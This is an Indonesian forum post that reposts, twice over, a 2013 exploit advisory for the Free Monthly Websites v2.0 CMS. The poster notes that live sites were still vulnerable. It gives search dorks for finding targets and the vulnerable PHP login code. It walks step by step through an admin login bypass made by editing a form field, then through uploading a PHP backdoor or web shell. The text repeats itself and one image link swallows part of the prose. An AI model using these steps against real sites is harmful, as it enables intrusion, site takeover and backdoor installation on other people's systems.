04-23-2013, 10:34 PM
Ini Udah 2 bulan yang lalu sih :v tapi 2 minggu yng lalu ane coba masih ada web yang kena ... lumayan buat nambah pengalaman bro..
sorry kalau sharenya telat
bahasa ingriss lagi tapi full gambar :-bd :-bd
Title:
======
Free Monthly Websites v2.0 - Multiple Web Vulnerabilities
Date:
=====
2013-02-04
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=851
VL-ID:
=====
851
Common Vulnerability Scoring System:
====================================
8.5
Introduction:
=============
Free Monthly Websites 2.0 is here and you no longer have to worry about editing complicated HTML code as we have
taken care of that for you, and you no longer have to worry about anything to do with website design as we have taken
care of that for you too, adding your Google AdSense Publisher code, taken care of, ClickBank! All done for you,
here\\\'s how it works. Upload Your Site To Your Domain (this can be done for you). Login To Your Admin Control Panel.
Personalize Your Website (takes just 5 minutes).
(Copy of the Vendor Homepage: http://www.freemonthlywebsites2.com/ )
Abstract:
=========
The independent Vulnerability Laboratory researcher (x-Cisadane) discovered multiple web vulnerabilities in the Free Monthly Websites v2.0 CMS.
Report-Timeline:
================
2013-02-04: Public Disclosure
Status:
========
Published
Exploitation-Technique:
=======================
Defensiv
Severity:
=========
Critical
Details:
========
Multiple web vulnerabilities are detected in the Free Monthly Websites v2.0 Content Management System.
The first bypass vulnerability allows attackers to bypass the system web application auth of the admin login.
The secound vulnerability allows to upload for example webshells and access them after upload via unauthorized web access.
Vulnerable Module(s):
[+] Login Auth (Admin) - Bypass
[+] Upload File - Unauthorized File Upload & Access
Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers without required user interaction or privileged application user account.
For demonstration or reproduce ...
Dork(s):
inurl:/index_ebay.php
"Powered by: Resell Rights Fortune"
"Generating Traffic to Your Site with Keyword Based Articles"
Powered By: Free Monthly Websites 2.0
[ 1 ] Admin Login Bypass
Vulnerable page http://target.com/[path]/admin/index.php
Line
40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()">
41 <input type="hidden" name="do_type" value="admin_settings_read">
Vulnerable page http://target.com/[path]/admin/login.php
Line
40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()">
41 <input type="hidden" name="do_type" value="admin_settings_read">
Vulnerable page http://target.com/[path]/admin/file_io.php
Line
14 if($_REQUEST[do_type]=="admin_settings_read")
15 {
16 $filename="settings/admin_settings.txt";
17
18 if(!$handle = fopen($filename, 'r'))
19 {
20 echo "Cannot open file ($filename)";
21 exit;
22 }
23 $contents = fread($handle, filesize($filename));
24 fclose($handle);
25 $argument_arr=explode("#_1_#",$contents);
26
27 if($argument_arr[0]==$_REQUEST[username] && $argument_arr[1]==$_REQUEST[pass])
28 {
29 $_SESSION[logged_in]=true;
30 header("location:welcome.php");
Based at line 16 we know that Admin Username and Password store in admin_settings.txt NOT on Database!
So When we login into Admin Panel, file_io.php will Read Valid Username and Password from admin_settings.txt
If you do a direct access to the file admin_settings.txt, The results is
403 Permission Denied
You do not have permission for this request /admin/settings/admin_settings.txt
Picture:![[Image: 2gvlwt4.png]](http://i48.tinypic.com/2gvlwt4.png)
So... How to Bypass Admin Login Page?
1st. Open the Admin Login Page : http://target.com/[path]/admin/index.php
2nd. Inspect Element on the login Form.
Picture:![[Image: 2r5ddp1.png]](http://i47.tinypic.com/2r5ddp1.png)
3rd. Change from
<form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form>
<input type="hidden" name="do_type" value="admin_settings_read">
CHANGE TO
<form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form>
<input type="text" name="do_type" value="admin_settings_write">
Then press ENTER (please see pic).
Pic :![[Image: 351z3ib.png]](http://i49.tinypic.com/351z3ib.png)
4th. You will see A Login Failed Page : >> You need to login in to access that page <<
Picture:![[Image: 33ws8jb.png]](http://i50.tinypic.com/33ws8jb.png)
Never Mind About that, just click 'Login Button' and VOILA you get and Admin Access!
Picture:
http://i45.tinypic.com/jzwpea.png">
----------------------------------------
[ 2 ] Upload PHP Backdoor or PHP Shell
This vulnerability works on PREMIUM VERSION of Free Monthly Websites 2.0
So... How to Upload Backdoor (PHP Shell)?
1st. Go to Add/Remove Navigation Page.
http://target.com/[path]/admin/add_main_pages.php
2nd. Enter a Name For Your New Navigation Page That You Wish To Add: dwi.php
And click Add New Navigation Page.
Picture:![[Image: vigzsp.png]](http://i45.tinypic.com/vigzsp.png)
3rd. Still at the same page, scroll down the page until you see this section : Sort Your Page Buttons/Links.
Pic :![[Image: 1040oxg.png]](http://i46.tinypic.com/1040oxg.png)
Change FROM dwi.php.html TO /dwi.php then Click Sort Navigation Pages.
Picture:![[Image: 24ec1l0.jpg]](http://i49.tinypic.com/24ec1l0.jpg)
4th. Go to Edit Navigation Page.
http://www.massmoneywebsites.com/admin/e..._pages.php
Please Select a Page To Edit: dwi.php.html <--- Select that page.
5th. Inspect element on dwi.php.html
Pic :![[Image: 29pq1ix.png]](http://i50.tinypic.com/29pq1ix.png)
Change FROM <option value="dwi.php.html" selected="">dwi.php.html</option>
To <option value="dwi.php" selected="">dwi.php</option>
Picture:![[Image: wtb0j6.png]](http://i47.tinypic.com/wtb0j6.png)
6th. Enter A Page Title As You Would Like It To Be Seen. Fill with dwi.php
URL For This Page: main_pages/dwi.php
Use the 'URL For This Page' field above: [Tick]
Display This Page in Left Vertical Site Navigation: [Tick]
Display This Page in Top Horizontal Site Navigation Buttons: [Tick]
Picture:![[Image: 1zebnle.png]](http://i46.tinypic.com/1zebnle.png)
7th. Still at the same page, scroll down the page until you see this section : Enter Content For Your Page:
Click SOURCE button
Press Enter Twice at the First Line then Paste your PHP Backdoor/PHP Shell below.
And Press Enter Twice at the Last Line.
*Please see 2 Pictures below If you dunno Understand :p
Picture 1 :![[Image: 1zlzxq0.png]](http://i49.tinypic.com/1zlzxq0.png)
Picture 2 :![[Image: 4rt1g4.png]](http://i48.tinypic.com/291kc9h.png%5Bimg%5D%20If%20you%20wanna%20do%20this,%20please%20remove%20your%20backdoor%20password.Click%20Save%20edited%20navigation%20page.%208th.%20After%20this%20message%20>>%20Data%20saved%20successfully%20<<%20Appeared,%20Visit%20the%20Home%20Page%20and%20you%20will%20see%20the%20Backdoor%20PagePicture%20:%20%5Bimg%5Dhttp://i49.tinypic.com/4rt1g4.png)
Risk:
=====
The security risk of the unauthorized file upload vulnerability via auth bypass is estimated as critical.
Credits:
========
X-Cisadane - ([email protected])
Greetz 2: X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club and Ngobas
Sumber :
http://www.exploit-db.com/exploits/24454/
http://packetstormsecurity.com/files/120...pload.html
sorry kalau sharenya telat
bahasa ingriss lagi tapi full gambar :-bd :-bd
Title:
======
Free Monthly Websites v2.0 - Multiple Web Vulnerabilities
Date:
=====
2013-02-04
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=851
VL-ID:
=====
851
Common Vulnerability Scoring System:
====================================
8.5
Introduction:
=============
Free Monthly Websites 2.0 is here and you no longer have to worry about editing complicated HTML code as we have
taken care of that for you, and you no longer have to worry about anything to do with website design as we have taken
care of that for you too, adding your Google AdSense Publisher code, taken care of, ClickBank! All done for you,
here\\\'s how it works. Upload Your Site To Your Domain (this can be done for you). Login To Your Admin Control Panel.
Personalize Your Website (takes just 5 minutes).
(Copy of the Vendor Homepage: http://www.freemonthlywebsites2.com/ )
Abstract:
=========
The independent Vulnerability Laboratory researcher (x-Cisadane) discovered multiple web vulnerabilities in the Free Monthly Websites v2.0 CMS.
Report-Timeline:
================
2013-02-04: Public Disclosure
Status:
========
Published
Exploitation-Technique:
=======================
Defensiv
Severity:
=========
Critical
Details:
========
Multiple web vulnerabilities are detected in the Free Monthly Websites v2.0 Content Management System.
The first bypass vulnerability allows attackers to bypass the system web application auth of the admin login.
The secound vulnerability allows to upload for example webshells and access them after upload via unauthorized web access.
Vulnerable Module(s):
[+] Login Auth (Admin) - Bypass
[+] Upload File - Unauthorized File Upload & Access
Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers without required user interaction or privileged application user account.
For demonstration or reproduce ...
Dork(s):
inurl:/index_ebay.php
"Powered by: Resell Rights Fortune"
"Generating Traffic to Your Site with Keyword Based Articles"
Powered By: Free Monthly Websites 2.0
[ 1 ] Admin Login Bypass
Vulnerable page http://target.com/[path]/admin/index.php
Line
40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()">
41 <input type="hidden" name="do_type" value="admin_settings_read">
Vulnerable page http://target.com/[path]/admin/login.php
Line
40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()">
41 <input type="hidden" name="do_type" value="admin_settings_read">
Vulnerable page http://target.com/[path]/admin/file_io.php
Line
14 if($_REQUEST[do_type]=="admin_settings_read")
15 {
16 $filename="settings/admin_settings.txt";
17
18 if(!$handle = fopen($filename, 'r'))
19 {
20 echo "Cannot open file ($filename)";
21 exit;
22 }
23 $contents = fread($handle, filesize($filename));
24 fclose($handle);
25 $argument_arr=explode("#_1_#",$contents);
26
27 if($argument_arr[0]==$_REQUEST[username] && $argument_arr[1]==$_REQUEST[pass])
28 {
29 $_SESSION[logged_in]=true;
30 header("location:welcome.php");
Based at line 16 we know that Admin Username and Password store in admin_settings.txt NOT on Database!
So When we login into Admin Panel, file_io.php will Read Valid Username and Password from admin_settings.txt
If you do a direct access to the file admin_settings.txt, The results is
403 Permission Denied
You do not have permission for this request /admin/settings/admin_settings.txt
Picture:
So... How to Bypass Admin Login Page?
1st. Open the Admin Login Page : http://target.com/[path]/admin/index.php
2nd. Inspect Element on the login Form.
Picture:
3rd. Change from
<form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form>
<input type="hidden" name="do_type" value="admin_settings_read">
CHANGE TO
<form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form>
<input type="text" name="do_type" value="admin_settings_write">
Then press ENTER (please see pic).
Pic :
4th. You will see A Login Failed Page : >> You need to login in to access that page <<
Picture:
Never Mind About that, just click 'Login Button' and VOILA you get and Admin Access!
Picture:
----------------------------------------
[ 2 ] Upload PHP Backdoor or PHP Shell
This vulnerability works on PREMIUM VERSION of Free Monthly Websites 2.0
So... How to Upload Backdoor (PHP Shell)?
1st. Go to Add/Remove Navigation Page.
http://target.com/[path]/admin/add_main_pages.php
2nd. Enter a Name For Your New Navigation Page That You Wish To Add: dwi.php
And click Add New Navigation Page.
Picture:
3rd. Still at the same page, scroll down the page until you see this section : Sort Your Page Buttons/Links.
Pic :
Change FROM dwi.php.html TO /dwi.php then Click Sort Navigation Pages.
Picture:
4th. Go to Edit Navigation Page.
http://www.massmoneywebsites.com/admin/e..._pages.php
Please Select a Page To Edit: dwi.php.html <--- Select that page.
5th. Inspect element on dwi.php.html
Pic :
Change FROM <option value="dwi.php.html" selected="">dwi.php.html</option>
To <option value="dwi.php" selected="">dwi.php</option>
Picture:
6th. Enter A Page Title As You Would Like It To Be Seen. Fill with dwi.php
URL For This Page: main_pages/dwi.php
Use the 'URL For This Page' field above: [Tick]
Display This Page in Left Vertical Site Navigation: [Tick]
Display This Page in Top Horizontal Site Navigation Buttons: [Tick]
Picture:
7th. Still at the same page, scroll down the page until you see this section : Enter Content For Your Page:
Click SOURCE button
Press Enter Twice at the First Line then Paste your PHP Backdoor/PHP Shell below.
And Press Enter Twice at the Last Line.
*Please see 2 Pictures below If you dunno Understand :p
Picture 1 :
Picture 2 :
Risk:
=====
The security risk of the unauthorized file upload vulnerability via auth bypass is estimated as critical.
Credits:
========
X-Cisadane - ([email protected])
Greetz 2: X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club and Ngobas
Sumber :
http://www.exploit-db.com/exploits/24454/
http://packetstormsecurity.com/files/120...pload.html
